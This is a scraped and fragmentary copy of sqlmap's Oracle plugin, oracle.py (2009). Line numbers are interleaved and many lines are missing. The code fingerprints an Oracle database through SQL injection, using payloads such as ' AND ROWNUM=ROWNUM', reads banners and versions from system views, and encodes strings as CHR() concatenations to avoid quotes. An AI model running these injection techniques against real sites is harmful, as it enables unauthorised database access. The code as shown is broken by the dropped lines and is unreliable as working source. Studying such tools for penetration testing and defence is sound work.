4
$Id: oracle.py 327 2009-01-12 21:35:38Z inquisb $
6
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
8
Copyright (c) 2006-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
9
and Daniele Bellucci <daniele.bellucci@gmail.com>
11
sqlmap is free software; you can redistribute it and/or modify it under
12
the terms of the GNU General Public License as published by the Free
13
Software Foundation version 2 of the License.
15
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
16
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
17
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
20
You should have received a copy of the GNU General Public License along
21
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
22
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
29
from lib.core.agent import agent
30
from lib.core.common import formatDBMSfp
31
from lib.core.common import formatFingerprint
32
from lib.core.common import getHtmlErrorFp
33
from lib.core.data import conf
34
from lib.core.data import kb
35
from lib.core.data import logger
36
from lib.core.exception import sqlmapSyntaxException
37
from lib.core.session import setDbms
38
from lib.core.settings import ORACLE_ALIASES
39
from lib.core.settings import ORACLE_SYSTEM_DBS
40
from lib.core.unescaper import unescaper
41
from lib.request import inject
42
from lib.request.connect import Connect as Request
44
from plugins.generic.enumeration import Enumeration
45
from plugins.generic.filesystem import Filesystem
46
from plugins.generic.fingerprint import Fingerprint
47
from plugins.generic.takeover import Takeover
50
class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
52
This class defines Oracle methods
57
self.excludeDbsList = ORACLE_SYSTEM_DBS
58
Enumeration.__init__(self, "Oracle")
60
unescaper.setUnescape(OracleMap.unescape)
64
def unescape(expression, quote=True):
67
index = expression.find("'")
71
firstIndex = index + 1
72
index = expression[firstIndex:].find("'")
75
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
77
lastIndex = firstIndex + index
78
old = "'%s'" % expression[firstIndex:lastIndex]
82
for i in range(firstIndex, lastIndex):
83
unescaped += "CHR(%d)" % (ord(expression[i]))
88
expression = expression.replace(old, unescaped)
90
expression = "||".join("CHR(%d)" % ord(c) for c in expression)
96
def escape(expression):
98
index = expression.find("CHR(")
103
index = expression[firstIndex:].find("))")
106
raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
108
lastIndex = firstIndex + index + 1
109
old = expression[firstIndex:lastIndex]
110
oldUpper = old.upper()
111
oldUpper = oldUpper.replace("CHR(", "").replace(")", "")
112
oldUpper = oldUpper.split("||")
114
escaped = "'%s'" % "".join([chr(int(char)) for char in oldUpper])
115
expression = expression.replace(old, escaped)
120
def getFingerprint(self):
122
wsOsFp = formatFingerprint("web server", kb.headersFp)
125
value += "%s\n" % wsOsFp
128
dbmsOsFp = formatFingerprint("back-end DBMS", kb.bannerFp)
131
value += "%s\n" % dbmsOsFp
133
value += "back-end DBMS: "
135
if not conf.extensiveFp:
139
actVer = formatDBMSfp()
141
value += "active fingerprint: %s" % actVer
144
banVer = kb.bannerFp["dbmsVersion"]
145
banVer = formatDBMSfp([banVer])
146
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
148
htmlErrorFp = getHtmlErrorFp()
151
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
157
if conf.dbms in ORACLE_ALIASES:
160
self.getPrematureBanner("SELECT banner FROM v$version WHERE ROWNUM=1")
162
if not conf.extensiveFp:
165
logMsg = "testing Oracle"
168
payload = agent.fullPayload(" AND ROWNUM=ROWNUM")
169
result = Request.queryPage(payload)
172
logMsg = "confirming Oracle"
175
payload = agent.fullPayload(" AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
176
result = Request.queryPage(payload)
179
warnMsg = "the back-end DMBS is not Oracle"
186
self.getPrematureBanner("SELECT banner FROM v$version WHERE ROWNUM=1")
188
if not conf.extensiveFp:
191
query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
192
version = inject.getValue(query)
194
if re.search("^11", version):
195
kb.dbmsVersion = ["11i"]
196
elif re.search("^10", version):
197
kb.dbmsVersion = ["10g"]
198
elif re.search("^9", version):
199
kb.dbmsVersion = ["9i"]
200
elif re.search("^8", version):
201
kb.dbmsVersion = ["8i"]
205
warnMsg = "the back-end DMBS is not Oracle"
211
def forceDbmsEnum(self):
213
conf.db = conf.db.upper()
217
warnMsg = "on Oracle it is only possible to enumerate "
218
warnMsg += "if you provide a TABLESPACE_NAME as database "
219
warnMsg += "name. sqlmap is going to use 'USERS' as database "
224
conf.tbl = conf.tbl.upper()
228
warnMsg = "on Oracle it is not possible to enumerate databases"